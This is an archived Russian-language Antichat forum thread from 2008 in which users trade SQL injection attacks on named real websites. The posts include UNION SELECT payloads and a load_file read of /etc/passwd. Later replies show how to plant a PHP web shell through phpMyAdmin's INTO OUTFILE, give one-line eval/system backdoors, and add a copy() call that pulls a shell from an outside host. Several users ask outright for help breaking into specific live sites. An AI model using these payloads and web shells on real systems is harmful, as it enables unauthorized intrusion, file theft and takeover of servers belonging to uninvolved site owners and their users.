ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
31.08.2008, 02:06
|
|
Новичок
Регистрация: 24.07.2008
Сообщений: 29
Провел на форуме:
109513
Репутация:
52
|
|
Сообщение от 0nep@t0p
2 jokester
Нет, там точно не на запятую ибо из информэйшн схема тэиблс все норм перебиралось лимитом, а вот из других табл уже облом
Линк кинул в пм
попробуй в запрос дописать +where+1=1, т.е. он будет примерно таким : www.site.com/blabla.php?id=-1+union+select+1,username,3+from+users+where+1=1+l imit+1,1/*
|
|
|
31.08.2008, 09:26
|
|
Участник форума
Регистрация: 06.11.2007
Сообщений: 143
Провел на форуме:
350782
Репутация:
81
|
|
есть читалка файлов
http://www.nebraska-outdoors.com/articles/article.php?aid=-1+union+select+load_file(0x2f6574632f706173737764) +from+users--
помогите найти путь к конфику апача
пробовал но не помогает:
/etc/httpd/conf/
/etc/apache/conf/
/etc/apache/
/etc/apache2/conf/
/var/httpd/conf
/var/www/conf
/usr/local/apache/conf/
/usr/local/apache2/conf/
/usr/local/httpd/conf/
|
|
|
|
31.08.2008, 10:18
|
|
Leaders of Antichat - Level 4
Регистрация: 16.01.2006
Сообщений: 1,966
Провел на форуме:
21768337
Репутация:
3486
|
|
Перебирай. https://forum.antichat.ru/showpost.php?p=467361&postcount=1
Ес-сно без ../../../ в начале.
|
|
|
|
31.08.2008, 18:55
|
|
Познающий
Регистрация: 27.01.2008
Сообщений: 57
Провел на форуме:
355954
Репутация:
32
|
|
Народ прошу помощи.
Вобщем есть рут доступ к PhpMyAdmin
Мне нужно залить шел, но проблема в том что там инклуды отключены 
Я заливал с помощью такого запроса
CREATE TABLE `forshelll` (`shl` TEXT NOT NULL)
TYPE = MYISAM ;
INSERT INTO `forshelll` ( `shell` )
VALUES (
'<?php include("http://shell.ru/shell.php") ?>'
); SELECT `shell` FROM `forshelll` INTO OUTFILE 'patch/www/shell.php'; DROP TABLE `forshelll`
Ворпос! как можно ище залить без инклуда? |
|
|
|
31.08.2008, 19:33
|
|
Участник форума
Регистрация: 25.05.2007
Сообщений: 147
Провел на форуме:
2313429
Репутация:
728
|
|
2 DJ ][akep
Юзай поиск, мне вот что часто помогало -
http://forum.antichat.ru/showpost.php?p=796617
|
|
|
|
31.08.2008, 22:17
|
|
Постоянный
Регистрация: 21.08.2008
Сообщений: 302
Провел на форуме:
458686
Репутация:
-25
|
|
Копал рыл ничего не нашёл! Гуру анти чата могет вы помогете!
www.dom2.ru есть уязвимости?
http://dom2.ru/pulse/heroes/?id=15601'
http://dom2.ru/magazine/?id=27965&article=3'
Жду ответа?
___________________________________________
И это уязвимость?
http://www.rk-triada.ru/index.php?-999
Последний раз редактировалось geforce; 31.08.2008 в 22:42..
|
|
|
|
31.08.2008, 23:58
|
|
Познавший АНТИЧАТ
Регистрация: 09.06.2006
Сообщений: 1,359
Провел на форуме:
5301021
Репутация:
1879
|
|
Ворпос! как можно ище залить без инклуда?
PHP код:
if(isset($_GET['shell'])) eval($_GET['shell']);
PHP код:
<?php system($_GET['cmd']);?>
Хотя смысл один и тот же...
|
|
|
|
01.09.2008, 11:52
|
|
Leaders of Antichat - Level 4
Регистрация: 16.01.2006
Сообщений: 1,966
Провел на форуме:
21768337
Репутация:
3486
|
|
Сообщение от DJ ][akep
Народ прошу помощи.
Вобщем есть рут доступ к PhpMyAdmin
Мне нужно залить шел, но проблема в том что там инклуды отключены
Я заливал с помощью такого запроса
CREATE TABLE `forshelll` (`shl` TEXT NOT NULL)
TYPE = MYISAM ;
INSERT INTO `forshelll` ( `shell` )
VALUES (
'<?php include("http://shell.ru/shell.php") ?>'
); SELECT `shell` FROM `forshelll` INTO OUTFILE 'patch/www/shell.php'; DROP TABLE `forshelll`
Ворпос! как можно ище залить без инклуда? SELECT '<?php if(isset($_REQUEST["id"])) eval($_REQUEST["id"]);?>' INTO OUTFILE '/blablabla/www/script.php';
Если пхпмайадмин будет ругаться, то переводи текст в кавычках в SQL HEX:
http://hack-shop.org.ru/tools-code-encode
И потом уже без кавычек подставляй в запрос.
/script.php?id=copy("http://shellsite.ru/shell.txt","/blablabla/www/shell.php");
/shell.php - тут шелл. Ессно должны быть права на запись, иначе хер что сделаешь.
|
|
|
|
01.09.2008, 16:33
|
|
Постоянный
Регистрация: 07.03.2008
Сообщений: 479
Провел на форуме:
791766
Репутация:
61
|
|
А не подскажите что можно сделать с сайтом у которого идёт фильтрация против SQl инъекций...
Движок: PHP-nuke
Модули:
/modules.php?name=WhatYourSpeed
/modules.php?name=Rules
/modules.php?name=Downloads
Ссылка: _http://la2ice.ru/
|
|
|
|
01.09.2008, 17:50
|
|
Новичок
Регистрация: 24.07.2008
Сообщений: 29
Провел на форуме:
109513
Репутация:
52
|
|
Доброго времени суток!
сайт http://geograd.ru/
magic_quotes off
мускул 5-ой версии
http://geograd.ru/?geo=-1&idnew=-328%27+union+select+1,2,3,4,table_schema+from+info rmation_schema.tables/*%22
тут все базы,судя по ним на серве крутится много сайтиков(если не прав,поправьте)
подскажите,как можно залить шелл на серв в данном случае?
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для DJ ][akep](/avatars/avatar48987.jpg?842315){kind=avatar}
Похожие темы
Линейный вид
